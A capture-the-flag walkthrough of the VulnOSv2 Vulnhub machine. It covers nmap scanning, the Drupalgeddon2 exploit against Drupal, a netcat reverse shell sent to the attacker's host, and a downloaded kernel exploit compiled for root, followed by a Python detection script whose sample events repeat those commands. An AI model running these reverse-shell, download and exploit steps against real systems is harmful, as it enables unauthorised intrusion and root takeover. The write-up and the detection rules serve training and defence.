VulnOSv2 Vulnhub Machine Walkthrough

Today we are working on the VulnOSv2 machine from Vulnhub.

First, let's find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine’s IP.

Let's do a detailed scan now.

nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Let's visit the website running on the machine.

It looks like the site is running on Drupal. Let's scan it with Droopescan.

droopescan scan drupal -u http://192.168.18.88/jabc

It seems the Drupal version is 7.22 – 7.26.

Let's look for vulnerabilities now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

It looks like it works on Drupal 7.x. Let's try it.

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Let's check the user.

Time for privilege escalation. First, let's get a shell through netcat.

Start a listener on Kali.

nc -nlvp 7777

Then connect from the victim machine.

nc -e /bin/sh 192.168.18.87 7777

Done.

Time for Privilege Escalation

Let's look up the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Let's try the first one, the Linux Kernel 3.13.0 < 3.19 exploit.

Use wget to download the file to the machine.

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit is there, then enter ./exploit to run it.

And… we are root!
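Seen from the defender's side, the steps above leave a recognisable process trail: the web server account running netcat with -e, downloading a file, compiling it, and then a root shell appearing under that account. The detection rules below are an added example, not part of the original walkthrough; they assume the web server runs as www-data and read a constructed user|parent_user|command event format that you would map from your own process telemetry.

```python
import re
import shlex

# Assumption: the web server runs as www-data (the Ubuntu Apache default).
SERVICE_USERS = {"www-data"}

# Constructed events in a made-up format: user|parent_user|command.
SAMPLE_EVENTS = """\
www-data|root|/usr/sbin/apache2 -k start
www-data|www-data|nc -e /bin/sh 192.168.18.87 7777
www-data|www-data|wget https://www.exploit-db.com/download/37292
www-data|www-data|gcc -o exploit 37292.c
www-data|www-data|./exploit
root|www-data|/bin/sh
root|root|apt-get update
"""

def nc_runs_program(argv):
    """True if netcat/ncat is told to attach a program to the socket."""
    return any(a in ("--exec", "--sh-exec")
               or (re.fullmatch(r"-[A-Za-z]+", a) and "e" in a)
               for a in argv)

def classify(user, parent_user, cmd):
    """Return the names of the rules that one event triggers."""
    argv = shlex.split(cmd)
    prog = argv[0].rsplit("/", 1)[-1]
    hits = []
    if user in SERVICE_USERS:
        if prog in {"nc", "ncat", "netcat"} and nc_runs_program(argv[1:]):
            hits.append("netcat-exec")
        if prog in {"wget", "curl"} and re.search(r"https?://", cmd):
            hits.append("service-account-download")
        if prog in {"gcc", "cc", "clang"}:
            hits.append("service-account-compile")
    # Root process directly under a service-account parent, not via su/sudo.
    if user == "root" and parent_user in SERVICE_USERS and prog not in {"su", "sudo"}:
        hits.append("service-to-root-transition")
    return hits

def scan(text):
    """Return [(line_no, command, rules)] for events that trigger a rule."""
    events = (line.split("|", 2) for line in text.splitlines())
    hits = ((no, cmd, classify(u, p, cmd)) for no, (u, p, cmd) in enumerate(events, 1))
    return [h for h in hits if h[2]]

if __name__ == "__main__":
    for no, cmd, rules in scan(SAMPLE_EVENTS):
        print(f"event {no}: {cmd} -> {', '.join(rules)}")
```

The netcat rule only looks at -e, --exec and --sh-exec; other ways of binding a shell to a socket need their own rules.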

Let's find the flag.

cd /root
cat flag.txt

Let's do another machine next day!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and Blogging. Love learning something new every day. Drop a mail to connect. Contact: melbin [-at-] melbin.in
